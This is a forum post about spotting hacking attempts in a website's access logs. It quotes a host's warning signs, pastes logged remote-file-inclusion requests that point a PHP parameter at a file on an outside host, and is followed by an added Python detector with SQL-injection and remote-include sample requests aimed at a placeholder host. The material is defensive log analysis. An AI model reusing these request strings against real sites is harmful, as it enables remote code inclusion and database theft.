2009-05-05, 12:02 AM
Advice from my host about what to look for to detect hacking or other suspicious activity:
Generally, you need to look for requests which target a PHP file on your website and end with:
=http://externalURL
This is a common method for exploiting vulnerable scripts by including external malicious content.
Other log entries which may indicate hacking attempts include:
"UNION SELECT"
which is used for SQL injections, targeting your database data (usually trying to find the password for the administrator user).
Well, guess what I saw in the visitor's log today:
86.122.170.50
//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:07 Http Version: HTTP/1.1 Size in Bytes: 5889
Referer: -
Agent: Mozilla/5.0
/forum//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
/forum/index.php//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
Anybody else seen stuff like this or recognize it?
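
The two patterns described in the post above (a parameter value that is itself an external URL, and "UNION SELECT") can be checked against logged request URIs as below. This is an added example, not part of the original post or the host's advice; the function names, the sample requests and the `attacker.example` host are assumptions made up for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# A parameter value that is itself a remote URL: the "=http://externalURL" pattern.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)
# UNION SELECT, allowing whitespace or /* */ comments between keywords and an optional ALL.
GAP = r"(?:\s|/\*.*?\*/)+"
UNION_SELECT = re.compile(rf"\bunion{GAP}(?:all{GAP})?select\b", re.I | re.S)


def classify(request_uri):
    """Return sorted findings such as 'remote-include:news_id' for one logged request URI."""
    # Split by hand: urlsplit() would read a leading "//" (as in "//index.php")
    # as a network location and lose the path.
    path, _, query = request_uri.partition("?")
    findings = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second pass catches double-encoded values
        if REMOTE_URL.match(value):
            findings.add(f"remote-include:{name}")
        if UNION_SELECT.search(value):
            findings.add(f"union-select:{name}")
    return sorted(findings)


# Constructed sample requests (not from a real log); attacker.example is a placeholder.
SAMPLE_REQUESTS = [
    "//index.php?&news_act=read&news_id=http://attacker.example/x.txt???",
    "/forum/index.php//index.php?&news_act=read&news_id=http%3A%2F%2Fattacker.example%2Fx.txt",
    "/news.php?id=1+UNION/**/ALL+SELECT+1,2,3",
    "/news.php?id=-1%2520union%2520select%25201,2",
    "/forum/index.php?showtopic=42",                 # clean request
    "/search.php?q=student+union+select+committee",  # benign text that still matches
]


def scan(requests):
    """Map each suspicious request to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := classify(r))}


if __name__ == "__main__":
    for req, found in scan(SAMPLE_REQUESTS).items():
        print(", ".join(found), "<-", req)
```

A match only shows that the request was sent; an HTTP 200 in the log does not by itself show that the include or the injection worked, since the script may have ignored the bad value and rendered normally. The last sample shows that keyword matching also fires on ordinary search text, so hits need manual review.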